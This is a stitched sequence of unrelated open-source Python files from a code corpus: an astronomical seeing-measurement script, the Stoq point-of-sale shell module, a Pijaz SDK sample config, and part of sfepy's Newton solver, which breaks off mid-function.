    def search_trails(self):
        """Detect star-trail segments in the image via photutils segmentation."""
        detection_threshold = detect_threshold(self.data, snr=1)
        smoothing_kernel = Gaussian2DKernel(2.0 * gaussian_fwhm_to_sigma,
                                            x_size=3, y_size=3)
        self.segments = detect_sources(self.data, detection_threshold,
                                       npixels=1000, filter_kernel=smoothing_kernel)
        self.segments_properties = segment_properties(self.data, self.segments)

    def nb_trails(self):
        """
        Give the number of trails detected

        :return: number of trails detected
        """
        return len(self.segments_properties)

    def calculate_fwhm(self):
        """Measure the median FWHM (and its std dev) of each detected trail."""
        self.trails_fwhm = np.array([])
        self.trails_stddev = np.array([])
        # half-width of the measurement window, in pixels, around each trail
        half_width_px = 2 * (self.target_fwhm_arcsec / self.sampling)

        for props in self.segments_properties:
            # x coordinate of the middle of the trail
            x_center = (props.xmax + props.xmin) / 2
            left = int(math.floor(x_center.value - half_width_px))
            right = int(math.ceil(x_center.value + half_width_px))
            # skip trails whose measurement window falls off the image
            if left < 1 or right > self.length_x_axis:
                continue

            coords = StarTrailCoordinates(left, right,
                                          int(props.ymin.value),
                                          int(props.ymax.value))
            trail = StarTrail(coords, self.data, self.sampling)
            trail.calculate_fwhms()
            self.trails_fwhm = np.append(self.trails_fwhm, trail.fwhm_median)
            self.trails_stddev = np.append(self.trails_stddev, trail.fwhm_stddev)

    def mean_fwhm(self):
        """Give the mean FWHM of the trails"""
        return np.mean(self.trails_fwhm)

    def mean_stddev(self):
        """Give the standard deviation of the FWHM of the trails"""
        return np.mean(self.trails_stddev)
# ################
# Main program
# ################
def main(directory, file_prefix, file_suffix, number_of_files, result_file, show_error_bar = False, sampling = 1, location='', instrument=''):
    """
    Measure the seeing of a sequence of images
    :param directory: the directory where the image files are located (with a slash or backslash at the end)
    :param file_prefix: beginning of the name of the files (example: 'seeing-')
    :param file_suffix: end of the name of the files (with extension) (example: '.fit')
    It is assumed that the file format is FITS.
    :param number_of_files: the number of files (begins with 1 and ends with this number).
    It is assumed that the number in the name of the files do not contains leading zero
    (example: 'seeing-1.fit' to 'seeing-152.fit').
    :param result_file: the file where the results will be written (CSV file)
    :param show_error_bar: if we plot error bars (example : True)
    :param sampling: the portion of sky viewed by a photosite (in arcsec)
    :param location: the location where the images have been taken. It is printed in the title of the plot image.
    :param instrument: the instrument with which the images were taken
    :return: void. Create or append to a file named 'seeing_measurement.csv' in execution directory with the results.
    Show a chart with the results.
    """
    target_fwhm_arcsec = 1.5 # to help the gaussian fitting
    # Create a file to write the results
    with open(result_file, 'a') as results:
        # Header of CSV file
        results.write('Date and time UTC,MJD,Seeing in arcsec,Std dev\n');
        measurements = np.array([])
        datetimes = np.array([])
        errorbar = np.array([])
        # For each file
        for i in range(1,number_of_files+1):
            # Open FITS file
            filename = file_prefix + str(i) + file_suffix
            path = directory + filename
            print "Read FITS file " + path
            hdulist = fits.open(path)
            # Get date and time of observation in FITS header
            datetime_string = hdulist[0].header['DATE-OBS']
            # NOTE(review): local name 'time' shadows any stdlib time module
            # import; harmless here but confusing.
            time = Time(datetime_string, format='isot', scale='utc')
            # Get length of X axis in FITS header
            length_x_axis = hdulist[0].header['NAXIS1']
            # Analyse data
            img_data = hdulist[0].data
            img = TrailsImage(img_data, sampling, target_fwhm_arcsec, length_x_axis)
            img.search_trails()
            img.calculate_fwhm()
            # Print results
            print "Date and time: %s UT" % datetime_string
            print "Number of trails: %i" % img.nb_trails()
            # if there is at least one star trail we can use and the incertitude of the measure is reasonable
            if(img.nb_trails() > 0 and img.mean_stddev() < 10):
                print "Mean FWHM of the trails: %f arcsec" % img.mean_fwhm()
                print "StdDev FWHM of the trails: %f" %img.mean_stddev()
                # Prepare plotting
                measurements = np.append(measurements, img.mean_fwhm())
                datetimes = np.append(datetimes, time.datetime)
                errorbar = np.append(errorbar, img.mean_stddev())
                # Write result in a file
                results.write(datetime_string + ',' + str(time.mjd) + ',' + str(img.mean_fwhm()) + ',' + str(img.mean_stddev()) + '\n');
            # Close FITS file
            hdulist.close()
            # Time of the first image of the sequence (used below)
            if 'start_time' not in locals():
                start_time = time
    # Close results file
    # NOTE(review): '.closed' is an attribute access, not a call — this
    # line is a no-op; the 'with' block above already closed the file.
    results.closed
    # Plot results
    start_time.out_subfmt='date'
    plt.figure(1)
    plt.title('Seeing ' + location + ' ' + instrument + ' ' + start_time.iso + ' (MJD ' + str(int(start_time.mjd)) + ')', fontsize=16)
    plt.xlabel('Time (UT)')
    if show_error_bar:
        postfix_error_bars = '_withErrorBars'
        plt.errorbar(datetimes, measurements, fmt='ko', yerr=errorbar);
    else:
        postfix_error_bars = ''
        plt.plot(datetimes, measurements, 'ko');
    plt.gca().xaxis.set_major_formatter(dates.DateFormatter('%H:%M'))
    plt.xticks(rotation='vertical')
    plt.ylabel('Seeing (arcsec)')
    #plt.show()
    # save plot in file
    filename_beginning = 'seeing_' + location + '_' + start_time.iso + '_' + instrument + postfix_error_bars
    filename_end = ''
    index_img = 1
    extension_img = '.png'
    # take care to not overwrite an existing file
    while os.path.isfile(filename_beginning + filename_end + extension_img):
        filename_end = '_' + str(index_img)
        index_img += 1
    plt.savefig(filename_beginning + filename_end + extension_img)
# Ad-hoc invocation history: one call per observing session; only the
# currently-processed session is left uncommented.
# 2015
#main('/home/didier/seeing_images/2015-09-17/', 'zenith_sans_suivi-', '.fits', 53, 'St-Veran')
#main('/home/didier/seeing_images/2015-09-18/', 'zenith-', '.fits', 175, 'St-Veran')
#main('/home/didier/seeing_images/2015-09-19/', 'zenith-', '.fits', 91, 'St-Veran')
#main('/home/didier/seeing_images/2015-09-19/', 'zenith_refocus1-', '.fits', 153, 'St-Veran')
#main('/home/didier/seeing_images/2015-09-19/', 'zenith_refocus1-', '.fits', 3, 'St-Veran')
# 2016
#main('/home/didier/seeing_images/2016-09-19/seeing1/', 'seeing-', '.fits', 121, 'null.csv', False, 0.206, 'St-Veran', 'T62')
main('/home/didier/seeing_images/2016-09-19/seeing2/', 'seeing2-', '.fits', 220, 'null.csv', False, 0.206, 'St-Veran', 'T62')
#main('/home/didier/seeing_images/2016-09-19/seeing3/', 'seeing3-', '.fits', 224, 'null.csv', False, 0.206, 'St-Veran', 'T62')
#main('/home/didier/seeing_images/2016-09-21/T62/', 'seeing1-', '.fits', 788, 'null.csv', False, 0.206, 'St-Veran', 'T62')
#main('/home/didier/seeing_images/2016-09-21/T50/rotate/', 'seeing-t50-1-', '.fits', 84, 'null.csv', False, 0.4635, 'St-Veran', 'T50')
#main('/home/didier/seeing_images/2016-09-21/T50/rotate/', 'seeing-t50-2-', '.fits', 254, 'null.csv', False, 0.4635, 'St-Veran', 'T50')
"Gaussian"
] | 92cca9e8a1d6e4c458de293050a0882e50f2c2d6000c835fc1bbfa04c48aabd3 |
# -*- coding: utf-8 -*-
# vi:si:et:sw=4:sts=4:ts=4
##
## Copyright (C) 2005-2013 Async Open Source <http://www.async.com.br>
## All rights reserved
##
## This program is free software; you can redistribute it and/or modify
## it under the terms of the GNU General Public License as published by
## the Free Software Foundation; either version 2 of the License, or
## (at your option) any later version.
##
## This program is distributed in the hope that it will be useful,
## but WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
## GNU Lesser General Public License for more details.
##
## You should have received a copy of the GNU General Public License
## along with this program; if not, write to the Free Software
## Foundation, Inc., or visit: http://www.gnu.org/.
##
## Author(s): Stoq Team <stoq-devel@async.com.br>
##
##
""" Stoq shell routines"""
import logging
import os
import sys
import glib
# FIXME: We can import whatever we want here, but don't import anything
# significant, it's good to maintain lazy loaded things during startup
from stoqlib.exceptions import StoqlibError
from stoqlib.lib.translation import stoqlib_gettext as _
from twisted.internet.defer import inlineCallbacks, succeed
log = logging.getLogger(__name__)
_shell = None
PRIVACY_STRING = _(
"One of the new features of Stoq 1.0 is support for online "
"services. Features using the online services include automatic "
"bug report and update notifications. More services are under development."
"To be able to provide a better service and properly identify the user "
"we will collect the CNPJ of the primary branch and the ip address.\n\n"
"<b>We will not disclose the collected information and we are committed "
"to keeping your privacy intact.</b>")
class ShellDatabaseConnection(object):
    """Sets up a database connection

    - Connects to a database
      - Telling why if it failed
    - Runs database wizard if needed
    - Runs schema migration
    - Activates plugins
    - Sets up main branch
    """

    def __init__(self, options):
        # options: parsed command-line options (expects .filename, .wizard)
        self._options = options
        self._config = None
        self._ran_wizard = False

    def connect(self):
        """Run the full connection sequence, in order: load config,
        maybe run the first-time wizard, connect, then post-connect
        checks (migration, branch, plugins)."""
        self._load_configuration()
        self._maybe_run_first_time_wizard()
        self._try_connect()
        self._post_connect()

    def _load_configuration(self):
        """Load stoq.conf, either from --filename or the default path."""
        from stoqlib.lib.configparser import StoqConfig
        log.debug('reading configuration')
        self._config = StoqConfig()
        if self._options.filename:
            self._config.load(self._options.filename)
        else:
            self._config.load_default()

    def _maybe_run_first_time_wizard(self):
        """Run the first-time configuration wizard when forced via
        --wizard, when no config file exists, or when the config was
        generated for a 'production-enable' migration."""
        from stoqlib.gui.base.dialogs import run_dialog
        from stoq.gui.config import FirstTimeConfigWizard

        config_file = self._config.get_filename()
        if self._options.wizard or not os.path.exists(config_file):
            run_dialog(FirstTimeConfigWizard, None, self._options)
            self._ran_wizard = True

        if self._config.get('Database', 'enable_production') == 'True':
            run_dialog(FirstTimeConfigWizard, None, self._options, self._config)
            self._ran_wizard = True

    def _get_password(self):
        """Return the database password stored (base64) in the 'data'
        file of the config directory, or None if the file is missing."""
        import binascii

        configdir = self._config.get_config_directory()
        filename = os.path.join(configdir, 'data')
        if not os.path.exists(filename):
            return

        data = open(filename).read()
        return binascii.a2b_base64(data)

    def _try_connect(self):
        """Connect to the database, retrying once with a freshly written
        .pgpass file when the first attempt fails for lack of a password.
        Any unrecoverable failure shows an error dialog (which exits)."""
        from stoqlib.lib.message import error

        try:
            store_dsn = self._config.get_settings().get_store_dsn()
        # NOTE(review): bare except — any failure reading the settings is
        # reported as a broken config file.
        except:
            type, value, trace = sys.exc_info()
            error(_("Could not open the database config file"),
                  _("Invalid config file settings, got error '%s', "
                    "of type '%s'") % (value, type))

        from stoqlib.database.exceptions import PostgreSQLError
        from stoqlib.database.runtime import get_default_store
        from stoqlib.exceptions import DatabaseError
        from stoqlib.lib.pgpass import write_pg_pass
        from stoq.lib.startup import setup

        # XXX: progress dialog for connecting (if it takes more than
        # 2 seconds) or creating the database
        log.debug('calling setup()')
        try:
            setup(self._config, self._options, register_station=False,
                  check_schema=False, load_plugins=False)
            # the setup call above is not really trying to connect (since
            # register_station, check_schema and load_plugins are all False).
            # Try to really connect here.
            get_default_store()
        except (StoqlibError, PostgreSQLError) as e:
            log.debug('Connection failed.')
            error(_('Could not connect to the database'),
                  'error=%s uri=%s' % (str(e), store_dsn))
        except DatabaseError:
            log.debug('Connection failed. Tring to setup .pgpass')
            # This is probably a missing password configuration. Setup the
            # pgpass file and try again.
            password = self._get_password()
            if not password:
                # There is no password stored in data file. Abort
                raise

            from stoqlib.database.settings import db_settings
            write_pg_pass(db_settings.dbname, db_settings.address,
                          db_settings.port, db_settings.username, password)
            # Now that there is a pg_pass file, try to connect again
            try:
                get_default_store()
            except DatabaseError as e:
                log.debug('Connection failed again.')
                error(_('Could not connect to the database'),
                      'error=%s uri=%s' % (str(e), store_dsn))

    def _post_connect(self):
        """Checks that must run once a connection is established."""
        self._check_schema_migration()
        self._check_branch()
        self._activate_plugins()

    def _check_schema_migration(self):
        """Run the schema-update wizard if the database is outdated, then
        verify the schema is consistent with the installed version."""
        from stoqlib.lib.message import error
        from stoqlib.database.migration import needs_schema_update
        from stoqlib.exceptions import DatabaseInconsistency
        if needs_schema_update():
            self._run_update_wizard()

        from stoqlib.database.migration import StoqlibSchemaMigration
        migration = StoqlibSchemaMigration()
        try:
            migration.check()
        except DatabaseInconsistency as e:
            error(_('The database version differs from your installed '
                    'version.'), str(e))

    def _activate_plugins(self):
        """Activate every plugin marked as installed in the database."""
        from stoqlib.lib.pluginmanager import get_plugin_manager
        manager = get_plugin_manager()
        manager.activate_installed_plugins()

    def _check_branch(self):
        """Make sure a main company/branch is registered, prompting the
        user with BranchDialog on a fresh database."""
        from stoqlib.database.runtime import (get_default_store, new_store,
                                              get_current_station,
                                              set_current_branch_station)
        from stoqlib.domain.person import Company
        from stoqlib.lib.parameters import sysparam
        from stoqlib.lib.message import info

        default_store = get_default_store()
        # NOTE(review): 'compaines' is a typo for 'companies' (local only).
        compaines = default_store.find(Company)
        if (compaines.count() == 0 or
            not sysparam.has_object('MAIN_COMPANY')):
            from stoqlib.gui.base.dialogs import run_dialog
            from stoqlib.gui.dialogs.branchdialog import BranchDialog
            if self._ran_wizard:
                info(_("You need to register a company before start using Stoq"))
            else:
                info(_("Could not find a company. You'll need to register one "
                       "before start using Stoq"))
            store = new_store()
            person = run_dialog(BranchDialog, None, store)
            if not person:
                raise SystemExit
            branch = person.branch
            sysparam.set_object(store, 'MAIN_COMPANY', branch)
            current_station = get_current_station(store)
            if current_station is not None:
                current_station.branch = branch
            store.commit()
            store.close()

        set_current_branch_station(default_store, station_name=None)

    def _run_update_wizard(self):
        """Run the schema update wizard; abort the process if cancelled."""
        from stoqlib.gui.base.dialogs import run_dialog
        from stoq.gui.update import SchemaUpdateWizard
        retval = run_dialog(SchemaUpdateWizard, None)
        if not retval:
            raise SystemExit()
class Shell(object):
    """The main application shell.

    - bootstraps via ShellBootstrap
    - connects to the database via ShellDatabaseConnection
    - handles login
    - runs applications
    """

    def __init__(self, bootstrap, options, initial=True):
        global _shell
        # Register this instance as the process-wide shell singleton.
        _shell = self
        self._appname = None
        self._bootstrap = bootstrap
        self._dbconn = ShellDatabaseConnection(options=options)
        self._blocked_apps = []
        self._hidden_apps = []
        self._login = None
        self._options = options
        self._user = None
        self.windows = []

    #
    # Private
    #

    def _do_login(self):
        """Perform the login and the post-login one-time dialogs.

        :returns: True on success, False on failed/cancelled login.
        """
        from stoqlib.exceptions import LoginError
        from stoqlib.gui.utils.login import LoginHelper
        from stoqlib.lib.message import error

        self._login = LoginHelper(username=self._options.login_username)
        try:
            if not self.login():
                return False
        except LoginError as e:
            error(str(e))
            return False
        self._check_param_online_services()
        self._maybe_show_welcome_dialog()
        return True

    def _check_param_online_services(self):
        """Ask (once) whether to enable online services and persist the
        answer in the ONLINE_SERVICES parameter."""
        from stoqlib.database.runtime import new_store
        from stoqlib.lib.parameters import sysparam
        import gtk

        # None means the question was never answered.
        if sysparam.get_bool('ONLINE_SERVICES') is None:
            from kiwi.ui.dialogs import HIGAlertDialog
            # FIXME: All of this is to avoid having to set markup as the default
            #        in kiwi/ui/dialogs:HIGAlertDialog.set_details, after 1.0
            #        this can be simplified when we fix so that all descriptions
            #        sent to these dialogs are properly escaped
            dialog = HIGAlertDialog(
                parent=None,
                flags=gtk.DIALOG_MODAL,
                type=gtk.MESSAGE_WARNING)
            dialog.add_button(_("Not right now"), gtk.RESPONSE_NO)
            dialog.add_button(_("Enable online services"), gtk.RESPONSE_YES)
            dialog.set_primary(_('Do you want to enable Stoq online services?'))
            dialog.set_details(PRIVACY_STRING, use_markup=True)
            dialog.set_default_response(gtk.RESPONSE_YES)
            response = dialog.run()
            dialog.destroy()
            store = new_store()
            sysparam.set_bool(store, 'ONLINE_SERVICES', response == gtk.RESPONSE_YES)
            store.commit()
            store.close()

    def _maybe_show_welcome_dialog(self):
        """Show the welcome dialog once per user, then disable it."""
        from stoqlib.api import api
        if not api.user_settings.get('show-welcome-dialog', True):
            return
        api.user_settings.set('show-welcome-dialog', False)

        from stoq.gui.welcomedialog import WelcomeDialog
        from stoqlib.gui.base.dialogs import run_dialog
        run_dialog(WelcomeDialog)

    def _maybe_correct_demo_position(self, shell_window):
        # Possibly correct window position (livecd workaround for small
        # screens)
        from stoqlib.lib.parameters import sysparam
        from stoqlib.lib.pluginmanager import get_plugin_manager
        manager = get_plugin_manager()
        if (sysparam.get_bool('DEMO_MODE') and
            manager.is_active(u'ecf')):
            pos = shell_window.toplevel.get_position()
            if pos[0] < 220:
                shell_window.toplevel.move(220, pos[1])

    def _maybe_schedule_idle_logout(self):
        # Verify if the user will use automatic logout.
        from stoqlib.lib.parameters import sysparam
        minutes = sysparam.get_int('AUTOMATIC_LOGOUT')
        # If user defined 0 minutes, ignore automatic logout.
        if minutes != 0:
            seconds = minutes * 60
            # Poll every 5 seconds for inactivity longer than 'seconds'.
            glib.timeout_add_seconds(5, self._verify_idle_logout, seconds)

    def _verify_idle_logout(self, seconds):
        # This is called once every 10 seconds
        from stoqlib.gui.utils.idle import get_idle_seconds
        if get_idle_seconds() > seconds:
            return self._idle_logout()
        # Call us again in 10 seconds
        return True

    def _idle_logout(self):
        # Before performing logout, verify that the currently opened window
        # is modal.
        from kiwi.component import get_utility
        from stoqlib.gui.base.dialogs import has_modal_window
        from stoqlib.lib.interfaces import ICookieFile
        # If not a modal window, logout.
        # Otherwise returns True to continue checking the automatic logout.
        if not has_modal_window():
            log.debug('Automatic logout')
            get_utility(ICookieFile).clear()
            self.quit(restart=True)
        return True

    def _logout(self):
        """Mark the current user as logged out in the database; errors
        are deliberately ignored (best effort during shutdown)."""
        from stoqlib.database.runtime import (get_current_user,
                                              get_default_store)
        log.debug('Logging out the current user')
        try:
            user = get_current_user(get_default_store())
            if user:
                user.logout()
        except StoqlibError:
            pass

    @inlineCallbacks
    def _terminate(self, restart=False, app=None):
        """Tear everything down and exit the process (never returns).

        :param restart: spawn a new Stoq process before exiting
        :param app: application name to open in the restarted process
        """
        log.info("Terminating Stoq")

        # This removes all temporary files created when calling
        # get_resource_filename() that extract files to the file system
        import pkg_resources
        pkg_resources.cleanup_resources()

        log.debug('Stopping deamon')
        from stoqlib.lib.daemonutils import stop_daemon
        stop_daemon()

        # Finally, go out of the reactor and show possible crash reports
        yield self._quit_reactor_and_maybe_show_crashreports()

        if restart:
            from stoqlib.lib.process import Process
            log.info('Restarting Stoq')
            args = [sys.argv[0], '--no-splash-screen']
            if app is not None:
                args.append(app)
            Process(args)

        # os._exit() forces a quit without running atexit handlers
        # and does not block on any running threads
        # FIXME: This is the wrong solution, we should figure out why there
        #        are any running threads/processes at this point
        log.debug("Terminating by calling os._exit()")
        os._exit(0)

        raise AssertionError("Should never happen")

    def _show_crash_reports(self):
        """Return a deferred for the crash-report dialog, or an
        already-fired deferred when there is nothing to report."""
        from stoqlib.lib.crashreport import has_tracebacks
        if not has_tracebacks():
            return succeed(None)
        if 'STOQ_DISABLE_CRASHREPORT' in os.environ:
            return succeed(None)
        from stoqlib.gui.dialogs.crashreportdialog import show_dialog
        return show_dialog()

    @inlineCallbacks
    def _quit_reactor_and_maybe_show_crashreports(self):
        log.debug("Show some crash reports")
        yield self._show_crash_reports()
        log.debug("Shutdown reactor")
        from twisted.internet import reactor
        reactor.stop()

    #
    # Public API
    #

    def login(self):
        """
        Do a login, first via the stored cookie and, failing that, by
        validating the user interactively.
        @returns: True if login succeed, otherwise false
        """
        from stoqlib.exceptions import LoginError
        from stoqlib.lib.message import info
        user = self._login.cookie_login()

        if not user:
            try:
                user = self._login.validate_user()
            except LoginError as e:
                info(str(e))

        if user:
            self._user = user
        return bool(user)

    def get_current_app_name(self):
        """
        Get the name of the currently running application
        @returns: the name
        @rtype: str
        """
        if not self.windows:
            return ''
        app = self.windows[0].current_app
        if not app:
            return ''
        return app.app_name

    def create_window(self):
        """
        Creates a new shell window.

        Note that it will not contain any applications and it will be hidden.

        :returns: the shell_window
        """
        from stoq.gui.shell.shellwindow import ShellWindow
        from stoqlib.database.runtime import get_default_store
        shell_window = ShellWindow(self._options,
                                   shell=self,
                                   store=get_default_store())
        self.windows.append(shell_window)

        self._maybe_correct_demo_position(shell_window)

        return shell_window

    def close_window(self, shell_window):
        """
        Close a currently open window
        :param ShellWindow shell_window: the shell_window
        """
        shell_window.close()
        self.windows.remove(shell_window)

    def main(self, appname, action_name=None):
        """
        Start the shell.
        This will:
        - connect to the database
        - login the current user
        - create a new window
        - run the launcher/application selector app
        - run a mainloop

        This will only exit when the complete stoq application
        is shutdown.

        :param appname: name of the application to run
        :param action_name: action to activate or ``None``
        """
        self._dbconn.connect()
        if not self._do_login():
            raise SystemExit
        if appname is None:
            appname = u'launcher'
        shell_window = self.create_window()
        app = shell_window.run_application(unicode(appname))
        shell_window.show()

        if action_name is not None:
            action = getattr(app, action_name, None)
            if action is not None:
                action.activate()

        self._maybe_schedule_idle_logout()
        log.debug("Entering reactor")
        self._bootstrap.entered_main = True
        from twisted.internet import reactor
        reactor.run()
        log.info("Leaving reactor")

    def quit(self, restart=False, app=None):
        """
        Quit the shell and exit the application.
        This will save user settings and then forcefully terminate
        the application

        :param restart: if ``True`` restart after terminating
        :param str app: if not ``None``, name of the application to restart
        """
        from stoqlib.api import api
        self._logout()

        # Write user settings to disk, this obviously only happens when
        # termination the complete stoq application
        log.debug("Flushing user settings")
        api.user_settings.flush()

        self._terminate(restart=restart, app=app)
def get_shell():
    """Return the process-wide :class:`Shell` singleton (set by
    ``Shell.__init__``), or None if no shell was created yet."""
    return _shell
| andrebellafronte/stoq | stoq/gui/shell/shell.py | Python | gpl-2.0 | 19,092 | [
"VisIt"
] | 6f78883062f843da37aecf11834dbc411b9411fd942c9af9644dee384b0b2479 |
"""
Pijaz client application settings.
Visit http://developer.pijaz.com/#manage-apps to create and edit client
applications.
"""
# App ID.
APP_ID = ''
# API key.
API_KEY = ''
"""
Product settings.
Visit http://developer.pijaz.com/#theme-designer to create and edit platform
products.
"""
# Workflow ID.
WORKFLOW_ID = ''
# Workflow URL.
WORKFLOW_XML_URL = ''
# Full local filepath for image file that the example code will create.
IMAGE_FILEPATH = '/tmp/hello-world-file.jpg'
"""
Pijaz Platform settings.
Settings specific to the Pijaz Synthesizer Platform; most often these should
not be edited.
"""
# Fully qualified URL of the rendering server, include the trailing slash.
RENDER_SERVER_URL = 'http://render.pijaz.com/'
# Fully qualified URL of the API server, include the trailing slash.
API_SERVER_URL = 'http://api.pijaz.com/'
| pijaz/pijaz-sdk | examples/python/config.sample.py | Python | mit | 860 | [
"VisIt"
] | 4ce49c1d2ce838a157c21ea5169584bf519a8a2e3707e8503834d23ac4f0e37d |
from sfepy.base.base import *
from sfepy.solvers.solvers import NonlinearSolver
import sfepy.base.plotutils as plu
##
# 13.12.2005, c
# 14.12.2005
# 02.10.2007
def check_tangent_matrix( conf, vec_x0, mtx_a0, evaluator ):
    """Compare the analytical tangent matrix with a central finite
    difference approximation of the residual, column by column, and plot
    the difference.

    :param conf: solver configuration (uses conf.delta, conf.check)
    :param vec_x0: state vector at which to check
    :param mtx_a0: preallocated tangent matrix storage
    :param evaluator: object providing eval_residual(), eval_tangent_matrix()
                      and update_vec()
    :returns: time spent printing/plotting (so callers can subtract it
              from their own timings)
    """
    vec_x = vec_x0.copy()
    delta = conf.delta

    vec_r, status = evaluator.eval_residual( vec_x ) # Update state.
    mtx_a0, status = evaluator.eval_tangent_matrix( vec_x, mtx_a0 )

    mtx_a = mtx_a0.tocsc()
    mtx_d = mtx_a.copy()
    mtx_d.data[:] = 0.0

    vec_dx = nm.zeros_like( vec_r )

    for ic in range( vec_dx.shape[0] ):
        # Central difference in component ic: (r(x+d e_ic) - r(x-d e_ic)) / 2d.
        vec_dx[ic] = delta
        xx = vec_x.copy()
        evaluator.update_vec( xx, vec_dx )
        vec_r1, status = evaluator.eval_residual( xx )

        vec_dx[ic] = -delta
        xx = vec_x.copy()
        evaluator.update_vec( xx, vec_dx )
        vec_r2, status = evaluator.eval_residual( xx )

        vec_dx[ic] = 0.0;

        vec = 0.5 * (vec_r2 - vec_r1) / delta

##         ir = mtx_a.indices[mtx_a.indptr[ic]:mtx_a.indptr[ic+1]]
##         for ii in ir:
##             mtx_d[ii,ic] = vec[ii]

        # Fill only the sparsity pattern of the analytical matrix.
        ir = mtx_a.indices[mtx_a.indptr[ic]:mtx_a.indptr[ic+1]]
        mtx_d.data[mtx_a.indptr[ic]:mtx_a.indptr[ic+1]] = vec[ir]

    vec_r, status = evaluator.eval_residual( vec_x ) # Restore.

    tt = time.clock()
    print mtx_a, '.. analytical'
    print mtx_d, '.. difference'
    plu.plot_matrix_diff( mtx_d, mtx_a, delta, ['difference', 'analytical'],
                          conf.check )

    return time.clock() - tt
##
# c: 02.12.2005, r: 02.04.2008
def conv_test(conf, it, err, err0):
    """Convergence test for the nonlinear loop.

    :param conf: solver configuration (macheps, eps_a, eps_r, i_max)
    :param it: current iteration number
    :param err: current residual norm
    :param err0: initial residual norm
    :returns: 0 when converged, 1 when the iteration limit was reached
              without convergence, -1 to continue iterating
    """
    # Relative error; guard against division by a (numerically) zero err0.
    rel_err = 0.0 if abs(err0) < conf.macheps else err / err0

    output('nls: iter: %d, residual: %e (rel: %e)' % (it, err, rel_err))

    # The relative criterion only applies after the first iteration.
    if it > 0:
        converged = (err < conf.eps_a) and (rel_err < conf.eps_r)
    else:
        converged = err < conf.eps_a

    if converged:
        return 0
    if it >= conf.i_max:
        return 1
    return -1
##
# 10.10.2007, c
class Newton( NonlinearSolver ):
    """Newton solver with a backtracking line search."""
    name = 'nls.newton'

    def process_conf( conf ):
        """
        Missing items are set to default values for a linear problem.

        Example configuration, all items:

        solver_1 = {
            'name' : 'newton',
            'kind' : 'nls.newton',

            'i_max'      : 2,
            'eps_a'      : 1e-8,
            'eps_r'      : 1e-2,
            'macheps'   : 1e-16,
            'lin_red'    : 1e-2, # Linear system error < (eps_a * lin_red).
            'ls_red'     : 0.1,
            'ls_red_warp' : 0.001,
            'ls_on'      : 0.99999,
            'ls_min'     : 1e-5,
            'check'     : 0,
            'delta'     : 1e-6,
            'is_plot'    : False,
            'problem'   : 'nonlinear', # 'nonlinear' or 'linear' (ignore i_max)
        }
        """
        get = conf.get_default_attr
        i_max = get( 'i_max', 1 )
        eps_a = get( 'eps_a', 1e-10 )
        eps_r = get( 'eps_r', 1.0 )
        macheps = get( 'macheps', nm.finfo( nm.float64 ).eps )
        lin_red = get( 'lin_red', 1.0 )
        ls_red = get( 'ls_red', 0.1 )
        ls_red_warp = get( 'ls_red_warp', 0.001 )
        ls_on = get( 'ls_on', 0.99999 )
        ls_min = get( 'ls_min', 1e-5 )
        check = get( 'check', 0 )
        delta = get( 'delta', 1e-6)
        is_plot = get( 'is_plot', False )
        problem = get( 'problem', 'nonlinear' )

        common = NonlinearSolver.process_conf( conf )
        # Struct(**locals()) packs all the option variables above into
        # the returned configuration object.
        return Struct( **locals() ) + common
    process_conf = staticmethod( process_conf )

    def __init__( self, conf, **kwargs ):
        NonlinearSolver.__init__( self, conf, **kwargs )

    def __call__( self, vec_x0, conf = None, evaluator = None,
                  lin_solver = None, status = None ):
        """setting conf.problem == 'linear' means 1 iteration and no rezidual
        check!
        """
        conf = get_default( conf, self.conf )
        evaluator = get_default( evaluator, self.evaluator )
        lin_solver = get_default( lin_solver, self.lin_solver )
        status = get_default( status, self.status )

        time_stats = {}

        vec_x = vec_x0.copy()
        vec_x_last = vec_x0.copy()
        vec_dx = None

        err0 = -1.0
        err_last = -1.0
        it = 0
        # Outer Newton loop; each pass does one residual/line-search
        # phase followed by one linear solve.
        while 1:

            ls = 1.0
            vec_dx0 = vec_dx;
            # Inner line-search loop: shrink the step until the residual
            # decreases enough (err < err_last * ls_on) or ls underflows.
            while 1:
                tt = time.clock()
                vec_r, ret = evaluator.eval_residual( vec_x )
                time_stats['rezidual'] = time.clock() - tt

                if ret == 0: # OK.
                    try:
                        err = nla.norm( vec_r )
                    except:
                        output( 'infs or nans in the residual:', vec_r )
                        output( nm.isfinite( vec_r ).all() )
                        debug()
                    if it == 0:
                        err0 = err;
                        break
                    if err < (err_last * conf.ls_on): break
                    red = conf.ls_red;
                    output( 'linesearch: iter %d, (%.5e < %.5e) (new ls: %e)'\
                            % (it, err, err_last * conf.ls_on, red * ls) )
                else: # Failure.
                    # Use the (much smaller) warp reduction when the
                    # residual evaluation itself failed.
                    red = conf.ls_red_warp;
                    output( 'rezidual computation failed for iter %d'
                            ' (new ls: %e)!' % (it, red * ls) )
                    if (it == 0):
                        raise RuntimeError, 'giving up...'

                if ls < conf.ls_min:
                    if ret != 0:
                        raise RuntimeError, 'giving up...'
                    output( 'linesearch failed, continuing anyway' )
                    break

                ls *= red;

                vec_dx = ls * vec_dx0;
                vec_x = vec_x_last.copy()
                evaluator.update_vec( vec_x, vec_dx )
            # End residual loop.

            err_last = err;
            vec_x_last = vec_x.copy()

            condition = conv_test( conf, it, err, err0 )
            if condition >= 0:
                break

            tt = time.clock()
            # For a linear problem the tangent matrix is constant and
            # already assembled.
            if conf.problem == 'nonlinear':
                mtx_a, ret = evaluator.eval_tangent_matrix( vec_x )
            else:
                mtx_a, ret = evaluator.mtx, 0
            time_stats['matrix'] = time.clock() - tt
            if ret != 0:
                raise RuntimeError, 'giving up...'

            if conf.check:
                tt = time.clock()
                wt = check_tangent_matrix( conf, vec_x, mtx_a, evaluator )
                time_stats['check'] = time.clock() - tt - wt
##                 if conf.check == 2: pause()

            tt = time.clock()
            vec_dx = lin_solver( vec_r, mtx = mtx_a )
            time_stats['solve'] = time.clock() - tt

            for kv in time_stats.iteritems():
                output( '%10s: %7.2f [s]' % kv )

            # Check how well the linear system was actually solved.
            vec_e = mtx_a * vec_dx - vec_r
            lerr = nla.norm( vec_e )
            if lerr > (conf.eps_a * conf.lin_red):
                output( 'linear system not solved! (err = %e)' % lerr )
#                raise RuntimeError, 'linear system not solved! (err = %e)' % lerr

            evaluator.update_vec( vec_x, vec_dx )

            if conf.is_plot:
                plu.pylab.ion()
                plu.pylab.gcf().clear()
                plu.pylab.subplot( 2, 2, 1 )
                plu.pylab.plot( vec_x_last )
                plu.pylab.ylabel( r'$x_{i-1}$' )
